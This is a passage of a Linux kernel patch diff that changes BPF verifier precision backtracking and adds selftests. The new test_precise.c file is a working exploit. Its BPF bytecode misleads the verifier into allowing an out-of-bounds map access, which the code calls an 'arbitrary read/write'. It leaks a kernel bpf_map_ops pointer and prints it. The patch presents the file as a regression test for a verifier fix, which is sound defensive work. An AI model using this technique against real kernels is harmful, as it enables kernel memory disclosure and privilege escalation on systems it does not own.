+					else if (bt_is_reg_set(bt, sreg)) {
+						bt_set_slot(bt, spi);
+						bt_clear_reg(bt, sreg);
+					} else if (bt_is_slot_set(bt, spi)) {
+						bt_set_reg(bt, sreg);
+						bt_clear_slot(bt, spi);
+					} else {
+						return 0;
+					}
+					break;
+			}
+        } else {
+               if (!bt_is_slot_set(bt, spi))
+                       return 0;
+               bt_clear_slot(bt, spi);
+               if (class == BPF_STX)
+                       bt_set_reg(bt, sreg);
+        }
 	} else if (class == BPF_JMP || class == BPF_JMP32) {
 		if (bpf_pseudo_call(insn)) {
 			int subprog_insn_idx, subprog;
diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
index 4225f975fce3..2d3d2d6b159b 100644
--- a/tools/testing/selftests/bpf/Makefile
+++ b/tools/testing/selftests/bpf/Makefile
@@ -53,7 +53,8 @@  TEST_GEN_PROGS = test_verifier test_tag test_maps test_lru_map test_lpm_map test
 	test_sock test_sockmap get_cgroup_id_user \
 	test_cgroup_storage \
 	test_tcpnotify_user test_sysctl \
-	test_progs-no_alu32
+	test_progs-no_alu32 \
+	test_precise
 TEST_INST_SUBDIRS := no_alu32
 
 # Also test bpf-gcc, if present
@@ -647,6 +648,9 @@  $(OUTPUT)/test_verifier: test_verifier.c verifier/tests.h $(BPFOBJ) | $(OUTPUT)
 	$(call msg,BINARY,,$@)
 	$(Q)$(CC) $(CFLAGS) $(filter %.a %.o %.c,$^) $(LDLIBS) -o $@
 
+$(OUTPUT)/test_precise: test_precise.c
+	$(Q)$(CC) $(CFLAGS) $(filter %.a %.o %.c,$^) -o $@
+
 # Include find_bit.c to compile xskxceiver.
 EXTRA_SRC := $(TOOLSDIR)/lib/find_bit.c
 $(OUTPUT)/xskxceiver: $(EXTRA_SRC) xskxceiver.c xskxceiver.h $(OUTPUT)/xsk.o $(OUTPUT)/xsk_xdp_progs.skel.h $(BPFOBJ) | $(OUTPUT)
diff --git a/tools/testing/selftests/bpf/test_precise.c b/tools/testing/selftests/bpf/test_precise.c
new file mode 100644
index 000000000000..8d3fe278579c
--- /dev/null
+++ b/tools/testing/selftests/bpf/test_precise.c
@@ -0,0 +1,186 @@ 
+#include <linux/bpf.h>
+#include <errno.h>
+#include <string.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include "../../../include/linux/filter.h"
+
+char logbuf[1024*1024];
+char data_in[1024], data_out[1024], ctx_in[1024], ctx_out[1024];
+extern int errno;
+
+static int setup_listener_sock();
+static int setup_send_sock();
+
+#define STORAGE_PTR_REG     BPF_REG_3
+#define CORRUPTED_PTR_REG   BPF_REG_4
+#define SPECIAL_VAL_REG     BPF_REG_5
+#define LEAKED_VAL_REG      BPF_REG_8
+
+#define STORAGE_MAP_SIZE (8192)
+
+int main(){
+
+	// Create map for out-of-bound access
+	unsigned long long key = 0;
+    union bpf_attr corrupt_map = {
+        .map_type = BPF_MAP_TYPE_ARRAY,
+        .key_size = 4,
+        .value_size = STORAGE_MAP_SIZE,
+        .max_entries = 1,
+    };
+
+    strcpy(corrupt_map.map_name, "corrupt_map");
+    int corrupt_map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &corrupt_map, sizeof(corrupt_map));
+    if (corrupt_map_fd < 0)
+        return 0;
+
+	// Set up the second, valid map in which we can store information
+    key = 0;
+    union bpf_attr storage_map = {
+        .map_type = BPF_MAP_TYPE_ARRAY,
+        .key_size = 4,
+        .value_size = STORAGE_MAP_SIZE,
+        .max_entries = 1
+    };
+    strcpy(storage_map.map_name, "storage_map");
+    int storage_map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &storage_map, sizeof(corrupt_map));
+    if (storage_map_fd < 0) {
+        return 0;
+	}
+
+
+	struct bpf_insn progBytecode[] = {
+        BPF_MOV64_IMM(BPF_REG_2, 1000),
+        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
+        BPF_ALU64_IMM(BPF_DIV, BPF_REG_2, 3),
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0, 2),
+        BPF_ST_MEM(BPF_DW, BPF_REG_3, -120, 200),
+        BPF_JMP_IMM(BPF_JA, 0, 0, 1),
+		BPF_ST_MEM(BPF_DW, BPF_REG_3, -120, -0x110),
+        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_3, -120),
+        /* Load the corrupt map */
+        BPF_MOV64_IMM(BPF_REG_0, 0),
+        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
+        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
+        BPF_LD_MAP_FD(BPF_REG_1, corrupt_map_fd),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
+        BPF_EXIT_INSN(),
+        // Trigger arbitrary read/write
+        BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
+        BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),
+        // Access map-0x110
+        BPF_LDX_MEM(BPF_DW, LEAKED_VAL_REG, BPF_REG_7, 0),
+        // Save the leaked bpf_map_ops into the second map
+        BPF_MOV64_IMM(BPF_REG_0, 0),    
+        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), 
+        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),   
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),  
+        BPF_LD_MAP_FD(BPF_REG_1, storage_map_fd),  
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),    
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),  
+        BPF_EXIT_INSN(),    
+        BPF_MOV64_REG(STORAGE_PTR_REG, BPF_REG_0),  
+        BPF_STX_MEM(BPF_DW, STORAGE_PTR_REG, LEAKED_VAL_REG, 0),
+ 		BPF_MOV64_IMM(BPF_REG_0, 0),
+        BPF_EXIT_INSN(),
+};
+
+    union bpf_attr progAttr;
+    memset(&progAttr, 0, sizeof(progAttr));
+    progAttr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
+    progAttr.license = (__u64)"Dual BSD/GPL";
+    progAttr.log_level = 2;
+    progAttr.log_size = 1024*1024;
+    progAttr.log_buf = (__u64)logbuf;
+    progAttr.insns = (__u64)progBytecode;
+    progAttr.insn_cnt = sizeof(progBytecode)/sizeof(struct bpf_insn);
+	progAttr.prog_flags = BPF_F_TEST_RND_HI32|BPF_F_TEST_STATE_FREQ;
+
+    errno = 0;
+    int fd = syscall(SYS_bpf, 0x5, &progAttr, sizeof(progAttr));
+    printf("%s\n%s\n", logbuf, strerror(errno));
+
+	/*
+    union bpf_attr attr;
+    memset(&attr, 0, sizeof(attr));
+    attr.test.prog_fd = fd;
+    attr.test.data_size_in = sizeof(data_in);
+    attr.test.data_size_out = sizeof(data_out);
+    attr.test.data_in = (__aligned_u64)data_in;
+    attr.test.data_out = (__aligned_u64)data_out;
+    errno = 0;
+    int ret = syscall(SYS_bpf, 10, &attr, sizeof(attr));
+    printf("BPF_PROG_TEST_RUN returns %d, %s, fd:%d\n", ret, strerror(errno), fd);
+	*/
+
+	int listener_sock = setup_listener_sock();
+    int send_sock = setup_send_sock();
+    if (listener_sock < 0 || send_sock < 0) {
+        return 0;
+	}
+    if (setsockopt(listener_sock, SOL_SOCKET, SO_ATTACH_BPF, &fd,
+               sizeof(fd)) < 0) {
+        return 0;
+    }
+    // trigger execution by connecting to the listener socket
+    struct sockaddr_in serverAddr;
+    serverAddr.sin_family = AF_INET;
+    serverAddr.sin_port = htons(1337);
+    serverAddr.sin_addr.s_addr = htonl(INADDR_ANY);
+    // no need to check connect, it will fail anyways
+    connect(send_sock, (struct sockaddr *)&serverAddr, sizeof(serverAddr));
+    close(listener_sock);
+    close(send_sock);
+
+	unsigned long lk[STORAGE_MAP_SIZE / sizeof(long long)];
+    memset(lk, 0, sizeof(lk));
+    key = 0;
+	union bpf_attr lookup_map = {
+        .map_fd = storage_map_fd,
+        .key = (unsigned long long)&key,
+        .value = (unsigned long long)&lk
+    };
+    int err = syscall(SYS_bpf, BPF_MAP_LOOKUP_ELEM, &lookup_map, sizeof(lookup_map));
+    if (err < 0) {
+        return 0;
+	}
+
+	printf("storage map value: %lx\n", *lk);
+	return 0;
+}
+
+static int setup_listener_sock()
+{
+    int sock_fd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC, 0);
+    if (sock_fd < 0) {
+        return sock_fd;
+    }
+
+    struct sockaddr_in serverAddr;
+    serverAddr.sin_family = AF_INET;
+    serverAddr.sin_port = htons(1337);
+    serverAddr.sin_addr.s_addr = htonl(INADDR_ANY);
+
+    int err = bind(sock_fd, (struct sockaddr *)&serverAddr, sizeof(serverAddr));
+    if (err < 0)
+        return err;
+
+    err = listen(sock_fd, 32);
+    if (err < 0)
+        return err;
+
+    return sock_fd;
+}
+
+
+static int setup_send_sock()
+{
+    return socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
+}
+
diff --git a/tools/testing/selftests/bpf/verifier/atomic_precision.c b/tools/testing/selftests/bpf/verifier/atomic_precision.c
new file mode 100644
index 000000000000..49ebf97a03e8
--- /dev/null
+++ b/tools/testing/selftests/bpf/verifier/atomic_precision.c
@@ -0,0 +1,19 @@ 
+{
+  "atomic_fetch_or: precision marking test",
+  .insns = {
+	BPF_CALL_REL(1),
+    BPF_EXIT_INSN(),
+	BPF_MOV64_IMM(BPF_REG_1, 1000),
+    BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
+    BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_1, -120),
+    BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),
+    BPF_ATOMIC_OP(BPF_W, BPF_OR | BPF_FETCH, BPF_REG_10, BPF_REG_7, -120),
+    BPF_ALU32_REG(BPF_OR, BPF_REG_7, BPF_REG_3),
+	BPF_MOV64_IMM(BPF_REG_0, 0),
+    BPF_EXIT_INSN(),
+  },
+  .result  = REJECT,
+  .errstr = "R7 32-bit pointer arithmetic prohibited",
+  .result_unpriv = REJECT,
+  .errstr_unpriv = "loading/calling other bpf or kernel functions are allowed for CAP_BPF and CAP_SYS_ADMIN",
+},